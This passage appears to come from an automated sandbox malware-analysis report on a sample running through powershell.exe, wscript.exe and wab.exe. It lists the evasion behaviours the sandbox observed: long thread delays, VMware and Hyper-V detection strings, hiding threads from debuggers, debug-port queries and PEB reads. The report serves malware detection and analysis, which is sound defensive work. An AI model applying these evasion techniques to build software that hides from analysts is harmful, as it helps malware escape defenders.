            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5274Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4625Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6358Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3499Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2719Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3703Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2760Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 968Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 703Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6097Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3643Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6995
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2518
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 571
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.8 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep count: 6358 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7084Thread sleep count: 3499 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5064Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4824Thread sleep count: 2719 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640Thread sleep count: 3703 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640Thread sleep time: -11109000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640Thread sleep count: 2760 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5640Thread sleep time: -8280000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3528Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep count: 6995 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep count: 2518 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1252Thread sleep count: 571 > 30
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 2719 delay: -5Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_222E10F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E6580 FindFirstFileExA,8_2_222E6580
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00418981 memset,GetSystemInfo,16_2_00418981
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WCN\en-GB\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\
            Source: wscript.exe, 0000000D.00000002.2517453779.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: powershell.exe, 00000002.00000002.2710409921.00000214ABD20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
            Source: wab.exe, 00000008.00000003.2493992487.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.0000000006491000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.000000000646C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.0000000006491000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000646D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.0000000006491000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000646C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 0000000D.00000002.2517453779.0000000003557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: powershell.exe, 0000000E.00000002.3267072681.00000000073D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_19-34118
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebugger
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB096E rdtsc 25_2_21FB096E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_049C8590 LdrInitializeThunk,5_2_049C8590
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_222E2639
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,16_2_004044A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E4AB4 mov eax, dword ptr fs:[00000030h]8_2_222E4AB4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA01F8 mov eax, dword ptr fs:[00000030h]25_2_21FA01F8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F951EF mov eax, dword ptr fs:[00000030h]25_2_21F951EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F751ED mov eax, dword ptr fs:[00000030h]25_2_21F751ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045227 mov eax, dword ptr fs:[00000030h]25_2_22045227
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAD1D0 mov eax, dword ptr fs:[00000030h]25_2_21FAD1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAD1D0 mov ecx, dword ptr fs:[00000030h]25_2_21FAD1D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8B1B0 mov eax, dword ptr fs:[00000030h]25_2_21F8B1B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202B256 mov eax, dword ptr fs:[00000030h]25_2_2202B256
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202B256 mov eax, dword ptr fs:[00000030h]25_2_2202B256
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF019F mov eax, dword ptr fs:[00000030h]25_2_21FF019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF019F mov eax, dword ptr fs:[00000030h]25_2_21FF019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF019F mov eax, dword ptr fs:[00000030h]25_2_21FF019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF019F mov eax, dword ptr fs:[00000030h]25_2_21FF019F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6A197 mov eax, dword ptr fs:[00000030h]25_2_21F6A197
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6A197 mov eax, dword ptr fs:[00000030h]25_2_21F6A197
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6A197 mov eax, dword ptr fs:[00000030h]25_2_21F6A197
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203D26B mov eax, dword ptr fs:[00000030h]25_2_2203D26B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203D26B mov eax, dword ptr fs:[00000030h]25_2_2203D26B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22020274 mov eax, dword ptr fs:[00000030h]25_2_22020274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB0185 mov eax, dword ptr fs:[00000030h]25_2_21FB0185
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045283 mov eax, dword ptr fs:[00000030h]25_2_22045283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h]25_2_220062A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220062A0 mov ecx, dword ptr fs:[00000030h]25_2_220062A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h]25_2_220062A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h]25_2_220062A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h]25_2_220062A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220062A0 mov eax, dword ptr fs:[00000030h]25_2_220062A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220072A0 mov eax, dword ptr fs:[00000030h]25_2_220072A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220072A0 mov eax, dword ptr fs:[00000030h]25_2_220072A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6C156 mov eax, dword ptr fs:[00000030h]25_2_21F6C156
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F76154 mov eax, dword ptr fs:[00000030h]25_2_21F76154
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F76154 mov eax, dword ptr fs:[00000030h]25_2_21F76154
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F77152 mov eax, dword ptr fs:[00000030h]25_2_21F77152
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69148 mov eax, dword ptr fs:[00000030h]25_2_21F69148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69148 mov eax, dword ptr fs:[00000030h]25_2_21F69148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69148 mov eax, dword ptr fs:[00000030h]25_2_21F69148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69148 mov eax, dword ptr fs:[00000030h]25_2_21F69148
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B136 mov eax, dword ptr fs:[00000030h]25_2_21F6B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B136 mov eax, dword ptr fs:[00000030h]25_2_21F6B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B136 mov eax, dword ptr fs:[00000030h]25_2_21F6B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B136 mov eax, dword ptr fs:[00000030h]25_2_21F6B136
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA0124 mov eax, dword ptr fs:[00000030h]25_2_21FA0124
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220452E2 mov eax, dword ptr fs:[00000030h]25_2_220452E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220212ED mov eax, dword ptr fs:[00000030h]25_2_220212ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F2F8 mov eax, dword ptr fs:[00000030h]25_2_2202F2F8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6C0F0 mov eax, dword ptr fs:[00000030h]25_2_21F6C0F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB20F0 mov ecx, dword ptr fs:[00000030h]25_2_21FB20F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6A0E3 mov ecx, dword ptr fs:[00000030h]25_2_21F6A0E3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F950E4 mov eax, dword ptr fs:[00000030h]25_2_21F950E4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F950E4 mov ecx, dword ptr fs:[00000030h]25_2_21F950E4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F780E9 mov eax, dword ptr fs:[00000030h]25_2_21F780E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF20DE mov eax, dword ptr fs:[00000030h]25_2_21FF20DE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F990DB mov eax, dword ptr fs:[00000030h]25_2_21F990DB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203132D mov eax, dword ptr fs:[00000030h]25_2_2203132D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203132D mov eax, dword ptr fs:[00000030h]25_2_2203132D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045341 mov eax, dword ptr fs:[00000030h]25_2_22045341
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F75096 mov eax, dword ptr fs:[00000030h]25_2_21F75096
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F367 mov eax, dword ptr fs:[00000030h]25_2_2202F367
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA909C mov eax, dword ptr fs:[00000030h]25_2_21FA909C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9D090 mov eax, dword ptr fs:[00000030h]25_2_21F9D090
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9D090 mov eax, dword ptr fs:[00000030h]25_2_21F9D090
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7208A mov eax, dword ptr fs:[00000030h]25_2_21F7208A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201437C mov eax, dword ptr fs:[00000030h]25_2_2201437C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9C073 mov eax, dword ptr fs:[00000030h]25_2_21F9C073
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2204539D mov eax, dword ptr fs:[00000030h]25_2_2204539D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F72050 mov eax, dword ptr fs:[00000030h]25_2_21F72050
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B052 mov eax, dword ptr fs:[00000030h]25_2_21F9B052
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202C3CD mov eax, dword ptr fs:[00000030h]25_2_2202C3CD
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6A020 mov eax, dword ptr fs:[00000030h]25_2_21F6A020
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6C020 mov eax, dword ptr fs:[00000030h]25_2_21F6C020
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h]25_2_21F8E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h]25_2_21F8E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h]25_2_21F8E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F8E016 mov eax, dword ptr fs:[00000030h]25_2_21F8E016
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220453FC mov eax, dword ptr fs:[00000030h]25_2_220453FC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA63FF mov eax, dword ptr fs:[00000030h]25_2_21FA63FF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F803E9 mov eax, dword ptr fs:[00000030h]25_2_21F803E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A3C0 mov eax, dword ptr fs:[00000030h]25_2_21F7A3C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h]25_2_21F783C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h]25_2_21F783C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h]25_2_21F783C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F783C0 mov eax, dword ptr fs:[00000030h]25_2_21F783C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203903E mov eax, dword ptr fs:[00000030h]25_2_2203903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203903E mov eax, dword ptr fs:[00000030h]25_2_2203903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203903E mov eax, dword ptr fs:[00000030h]25_2_2203903E
